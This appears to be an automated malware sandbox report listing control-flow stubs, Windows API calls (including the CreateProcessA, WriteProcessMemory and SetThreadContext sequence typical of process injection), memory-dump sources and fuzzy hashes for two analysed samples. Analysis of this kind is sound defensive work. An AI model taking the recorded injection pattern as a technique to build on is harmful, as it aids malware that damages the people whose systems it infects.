                                                        • Opcode ID: 87e06866fa3a47655327e2f0db05224274c966bb0684c7d84458815619d79014
                                                        • Instruction ID: 947dd7cae44dbcfb04ec9ea38964a13321c6d988a76b9d41ed06e6f4cbe789e7
                                                        • Opcode Fuzzy Hash: 87e06866fa3a47655327e2f0db05224274c966bb0684c7d84458815619d79014
                                                        • Instruction Fuzzy Hash: ED21E0B5900209AFDB10CFAAD984ADEBBF8EB48720F14841AE914A7310D374A954DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 45 1258d38-1259f40 47 1259f42-1259f45 45->47 48 1259f48-1259f77 LoadLibraryExW 45->48 47->48 49 1259f80-1259f9d 48->49 50 1259f79-1259f7f 48->50 50->49
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01259D59,00000800,00000000,00000000), ref: 01259F6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: d<nm
                                                        • API String ID: 1029625771-1879898224
                                                        • Opcode ID: e0de4d28765d00ec66d6ef50ebc5b8fedbd7357909fe731a1c51c40d47244a68
                                                        • Instruction ID: f452a34598b32acdb770eb796a2f693c1b67b75d4afebe3ffcab0c66a90b2d79
                                                        • Opcode Fuzzy Hash: e0de4d28765d00ec66d6ef50ebc5b8fedbd7357909fe731a1c51c40d47244a68
                                                        • Instruction Fuzzy Hash: C21117B2910309CFDB10CF9AC884BDEFBF4EB88714F14842AE915A7200C374A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 53 1259ef8-1259f40 55 1259f42-1259f45 53->55 56 1259f48-1259f77 LoadLibraryExW 53->56 55->56 57 1259f80-1259f9d 56->57 58 1259f79-1259f7f 56->58 58->57
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01259D59,00000800,00000000,00000000), ref: 01259F6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: d<nm
                                                        • API String ID: 1029625771-1879898224
                                                        • Opcode ID: 7f51581089d4aedc1607e20577ce5d8ec8a406cfcc03ef9632cbe8680a4cfda1
                                                        • Instruction ID: 1c31e0d7e1c76f9624157a84cb1a85caf5de3b40f5fe0c5843a10fcf3fd8f3a8
                                                        • Opcode Fuzzy Hash: 7f51581089d4aedc1607e20577ce5d8ec8a406cfcc03ef9632cbe8680a4cfda1
                                                        • Instruction Fuzzy Hash: 021114B2D103498FDB10CF9AD884BDEFFF4AB88724F14842AE955A7200C774A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 61 1259c78-1259cb8 62 1259cc0-1259ceb GetModuleHandleW 61->62 63 1259cba-1259cbd 61->63 64 1259cf4-1259d08 62->64 65 1259ced-1259cf3 62->65 63->62 65->64
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01259CDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID: d<nm
                                                        • API String ID: 4139908857-1879898224
                                                        • Opcode ID: 0f62ad22d5afa1430e19d88d0fc4145dbd0afb865fc32e5346ae7c1914293a1d
                                                        • Instruction ID: 8bbc498ee6419da7b478e36503d8be0ba80dabf7039c1da5f8d484455731c1ff
                                                        • Opcode Fuzzy Hash: 0f62ad22d5afa1430e19d88d0fc4145dbd0afb865fc32e5346ae7c1914293a1d
                                                        • Instruction Fuzzy Hash: A011E0B6C00249CFDB10CF9AC584BDEFBF4AF88724F14846AD929A7610C374A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01259CDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID: d<nm
                                                        • API String ID: 4139908857-1879898224
                                                        • Opcode ID: 5ab953cff2561bee9cfa27f34d002d73eac1040b83efc2190d3c32cde8087762
                                                        • Instruction ID: 15c181e3d7e73f913a5a1c38e1398624c561f78c0ef93161073255c97c7325d0
                                                        • Opcode Fuzzy Hash: 5ab953cff2561bee9cfa27f34d002d73eac1040b83efc2190d3c32cde8087762
                                                        • Instruction Fuzzy Hash: 2811E0B6C00249CFDB10CF9AC584BDEFBF4AF48624F14846AD929B7610C374A585CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01259CDE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: ecffedea5305dd3a36229bc6a216f8c68f88dcc7716ebf34b524c0636c3c4961
                                                        • Instruction ID: 76443f668eda8d6faec040efbee1e1814cd500c7210ea31b8a911448dc611f76
                                                        • Opcode Fuzzy Hash: ecffedea5305dd3a36229bc6a216f8c68f88dcc7716ebf34b524c0636c3c4961
                                                        • Instruction Fuzzy Hash: 5A713970A10B068FEB64DF29D09075ABBF1BF88304F10892DD99AD7A40EB75E845CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6ee7a33110430938771fa08a981ba4b80f70f80b425f74bd7cc0174f5230fe8
                                                        • Instruction ID: c486b8c5622e08191e447a1bbd7e253d95dd4bf5f7ffc6433811d880115abbbf
                                                        • Opcode Fuzzy Hash: a6ee7a33110430938771fa08a981ba4b80f70f80b425f74bd7cc0174f5230fe8
                                                        • Instruction Fuzzy Hash: 2C2106B1504240DFDF09DF58E9C4B26BF75FB84328F24856DDA450B216C336D846D7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18adad7544f684c6007fe5825782fa5ea388c9ca3671abb05b4f9d5e00f91827
                                                        • Instruction ID: defc7b7ee0edf165c11fdd0e9652b88c9ec12525e087bf90845940f1ba3667b4
                                                        • Opcode Fuzzy Hash: 18adad7544f684c6007fe5825782fa5ea388c9ca3671abb05b4f9d5e00f91827
                                                        • Instruction Fuzzy Hash: 68212271514248EFDB02DF98D9C0B26BBA1FB84324F20CB6DE9494B287C376D846CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7216e0672940d578ed1c9d2b6b432d1599f6d338279040eb154f7072892c7ea
                                                        • Instruction ID: 02e340e882c198961c1119b2f89d4b60ce70b465b3aaf24b01adcf2866415280
                                                        • Opcode Fuzzy Hash: e7216e0672940d578ed1c9d2b6b432d1599f6d338279040eb154f7072892c7ea
                                                        • Instruction Fuzzy Hash: 3C214571614248DFDB12CF98D8C0B16BB62FB84364F20CA69D94E0B287C336D807CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction ID: 948417058fce70306e7194dc84446f2df7d70ea37fb6b34f9a592327c809e08c
                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction Fuzzy Hash: 4311AF76504280CFDF16CF54E5C4B26BF71FB84324F2486ADD9450B666C336D45ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction ID: 90275c15bf7c77c478f16c6daf0d95f701b98af20a276383731cb45b87b4587d
                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction Fuzzy Hash: 8D11BB75504284CFDB12CF58D5C4B15BBA2FB84324F28C6AAD9494B697C33AD44ACBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429664535.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_120d000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction ID: f8bbe33b9038ab48ad67dea9c92d321c2aa9e61ea9cc333d802dbacd1d7c0610
                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction Fuzzy Hash: 3611BB75905284DFDB02CF98C5C0B15BBA1FB84324F28C6ADD9494B697C33AD44ACB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ef2a4d6b35465b2c9ce4c5327bf7053bc24c441871766caf41f342eb81abff84
                                                        • Instruction ID: e538f0ba1700b6e5f2d1634df9b3a6c7436d38faf696961b24fc934a214e2d48
                                                        • Opcode Fuzzy Hash: ef2a4d6b35465b2c9ce4c5327bf7053bc24c441871766caf41f342eb81abff84
                                                        • Instruction Fuzzy Hash: 7201F7715087C09AEB198E99DC84B76BF98EF41678F08861EEF051F246C3789844C6B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429339999.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_11fd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8635437a742cc83782cb836d190e1ea0be85b8939eb471f8d0514b4796d66bda
                                                        • Instruction ID: 1f997b813707576a1b6fdc0ceddc412759f7cbb58d8173157f1c7e3cbf13f873
                                                        • Opcode Fuzzy Hash: 8635437a742cc83782cb836d190e1ea0be85b8939eb471f8d0514b4796d66bda
                                                        • Instruction Fuzzy Hash: 3CF0C2714047849EEB158E59DCC4B72FF98EB81634F18C55EEE081F286C3789844CAB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 955583e33bf6643226d4e853386b7f5c96248f3d2020452e59800c58b3cc3529
                                                        • Instruction ID: 58e5b93b34a0acaaef433a4e08590411fe67c7cf0e72470b3838ec0bf376045f
                                                        • Opcode Fuzzy Hash: 955583e33bf6643226d4e853386b7f5c96248f3d2020452e59800c58b3cc3529
                                                        • Instruction Fuzzy Hash: 5E1292F14217468AF310CFA5E99B18D7FA3B78532CB924208F2615EAD1DBB815CACF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ced8efdb15f162f84688bedb8c72855dcaf66732ee1f09b90fe0e5639e55a7a
                                                        • Instruction ID: c040d422fea012f99f5d23704e84a490d28834330e551b203f5d9a2606cecfac
                                                        • Opcode Fuzzy Hash: 9ced8efdb15f162f84688bedb8c72855dcaf66732ee1f09b90fe0e5639e55a7a
                                                        • Instruction Fuzzy Hash: 34A18632E2020ACFCF05DFA5C9845EDBBB6FF85300B158569E905BB261EB319955CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.429954597.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1250000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc90adcf16dfeabf2d2550b94fe45fd69ede5df786ffe1967afe23dd8f5c6695
                                                        • Instruction ID: febcf38bff033722eb4e7fb0ef2512c7ec2a188bef258592d2826f53a3379bc0
                                                        • Opcode Fuzzy Hash: fc90adcf16dfeabf2d2550b94fe45fd69ede5df786ffe1967afe23dd8f5c6695
                                                        • Instruction Fuzzy Hash: 2EC1F7B18217468AE710DFA5E88B18D7FA2BB8532CF564208F2616F6D0DFB415CACF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:13.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:234
                                                        Total number of Limit Nodes:17

                                                        Control-flow Graph

                                                        APIs
                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 086B2CC6
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ContextThread
                                                        • String ID:
                                                        • API String ID: 1591575202-0
                                                        • Opcode ID: c0aa5e6d3f9272aa642e5d5786bad7203e5ec2ef35af2f7312a8ee312ffc6f16
                                                        • Instruction ID: fefbe686e5c2c02a6ee232fdc71b8f18803a429d55535f002512e24c8cc1dd09
                                                        • Opcode Fuzzy Hash: c0aa5e6d3f9272aa642e5d5786bad7203e5ec2ef35af2f7312a8ee312ffc6f16
                                                        • Instruction Fuzzy Hash: BE91CF70A005258FCB55DB6DC8A07BEFBE2EF85315B25C61AD419A7349CB74AC82CBD0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b305c-86b30fd, API call: CreateProcessA)
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 086B329E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: c0c81472b188cb130c91fdd199cc73d60f370bd70e72c8922837e4af9172c308
                                                        • Instruction ID: 6a194c0fd9ba2f1749aba8234a20aee61d22a18032d29358c742e32affe049d8
                                                        • Opcode Fuzzy Hash: c0c81472b188cb130c91fdd199cc73d60f370bd70e72c8922837e4af9172c308
                                                        • Instruction Fuzzy Hash: F6A15871E00259DFDB20DFA8C981BEEBAF2BF48305F158169E849A7340DB749985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b3068-86b30fd, API call: CreateProcessA)
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 086B329E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 47306cfafa482f698317a21dfad6532454c7e011dd90630c23db437ec2f9013c
                                                        • Instruction ID: 332f154d4d6e1e16ac83e4d3861e7682f946fe9d409ecd1802b1fc87f9f4a266
                                                        • Opcode Fuzzy Hash: 47306cfafa482f698317a21dfad6532454c7e011dd90630c23db437ec2f9013c
                                                        • Instruction Fuzzy Hash: 84915971E00259DFDB20DFA8C981BEEBAF2BF48315F158169E809A7340DB749985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 2e09a98-2e09aa0, API call: GetModuleHandleW)
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E09CDE
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 7abb5603a5d95866c0bfa36fedbec6d07aa4730925d78f3fe678377b4345a7c6
                                                        • Instruction ID: 4f2b64c1979cf2a1e0d81a061261e1ffff1e9fa200fbdcd5c070ead420d2ecf9
                                                        • Opcode Fuzzy Hash: 7abb5603a5d95866c0bfa36fedbec6d07aa4730925d78f3fe678377b4345a7c6
                                                        • Instruction Fuzzy Hash: EC611770A00B058FD764DF29D0A075AB7F1BF88714F108A2ED48ADBA91DB35E846CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b5400-86b5404, API call: FindCloseChangeNotification)
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,086B5211,?,?), ref: 086B53B8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 40e98f200e590c6f4356fdbc8ba7c371dac1883e48f3742a0aae1f695658071b
                                                        • Instruction ID: ceac2b2edfac6deb32abb67223c154ab75cde35bc104462c48cf3e119e47e0c0
                                                        • Opcode Fuzzy Hash: 40e98f200e590c6f4356fdbc8ba7c371dac1883e48f3742a0aae1f695658071b
                                                        • Instruction Fuzzy Hash: 9D3147766406058FC721DF6DC4483DDBBE2BF84326F19846EC15ACB762DB389486CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 2e0565c-2e05663, API call: CreateActCtxA)
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02E05719
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 6d5ef716357cd19e7203f86deccb5e4b225c60ec4653bee4db7facb4b74fa806
                                                        • Instruction ID: 85afae1549163a0fcee3347a62df1d48dffe775698a9571e13ce213dab5e7c27
                                                        • Opcode Fuzzy Hash: 6d5ef716357cd19e7203f86deccb5e4b225c60ec4653bee4db7facb4b74fa806
                                                        • Instruction Fuzzy Hash: F841F671C4061DCFDB24DF99C884BCDBBB5BF48304F648069D409AB250D7756986DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 2e04124-2e05729, API call: CreateActCtxA)
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02E05719
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 96be9b0d0422a3ce6c1c756cb8deba8d01332c40bc607dd2c1923cb027973b17
                                                        • Instruction ID: 9bea3bb581512f7fd2d51e029c48ca9511734b78061694387037cbd3267cc13a
                                                        • Opcode Fuzzy Hash: 96be9b0d0422a3ce6c1c756cb8deba8d01332c40bc607dd2c1923cb027973b17
                                                        • Instruction Fuzzy Hash: 2741F470C4061DCFDB24DF99C884BDEBBB5BF48304F548069D409AB291D7B46986DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b2dd8-86b2e2e, API call: WriteProcessMemory)
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 086B2E70
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 3981ce0d24675dfebbe52519c8c3bdec48a181ad19bd1a2356f36ee91c88edeb
                                                        • Instruction ID: c2f2cd0c5599d2922abf14fa19cd794e67c74007776515089a956cf871e40985
                                                        • Opcode Fuzzy Hash: 3981ce0d24675dfebbe52519c8c3bdec48a181ad19bd1a2356f36ee91c88edeb
                                                        • Instruction Fuzzy Hash: 172148B19003599FCB10CFAAC8847EEBBF4FF48310F54842AE819A7350C778A955CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b2de0-86b2e2e, API call: WriteProcessMemory)
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 086B2E70
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 86dd5b57b7f00d89c6c6a236556a5dade995cc3d4f9f679a78ab2cd476d56b71
                                                        • Instruction ID: 453ab583a1d7baf5460f1023cd3aa1065ac7af2d017ce637d68a39ca9d263174
                                                        • Opcode Fuzzy Hash: 86dd5b57b7f00d89c6c6a236556a5dade995cc3d4f9f679a78ab2cd476d56b71
                                                        • Instruction Fuzzy Hash: 842127B19003499FCB10CFAAC8847DEBBF5FF48314F548429E919A7350C7789945DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 2e0a7e4-2e0c08c, API call: DuplicateHandle)
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0BFBE,?,?,?,?,?), ref: 02E0C07F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 7da37be7313c8837d55896be97a1034f55e16bd77f783238c95ee1b692ca60eb
                                                        • Instruction ID: a9eb3307a020c5ae8c732f52159860df9687db01cbf281f9aa15bad4edcdefe9
                                                        • Opcode Fuzzy Hash: 7da37be7313c8837d55896be97a1034f55e16bd77f783238c95ee1b692ca60eb
                                                        • Instruction Fuzzy Hash: 1F2103B59002099FCB10CFAAD984ADEBBF8EB48320F14841AE814B7350D374A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b2ec8-86b2f5d, API call: ReadProcessMemory)
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 086B2F50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 7c4556b595083883d8b60a987581327df5cf2ebc5e07c4819f048c6e9331e59a
                                                        • Instruction ID: 5a24713f4621767d844b2f40c834fd7897f1db8a1aa9a72182fe92992a86e013
                                                        • Opcode Fuzzy Hash: 7c4556b595083883d8b60a987581327df5cf2ebc5e07c4819f048c6e9331e59a
                                                        • Instruction Fuzzy Hash: 222134B1C003099FCB10CFAAC9806EEBBF5FF48310F50842AE419A7240C7789A41DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b2ed0-86b2f5d, API call: ReadProcessMemory)
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 086B2F50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: ca01ae02aa8da45e4acdd178e1670c5de97976db7925d415ea1e87aeb3c3decc
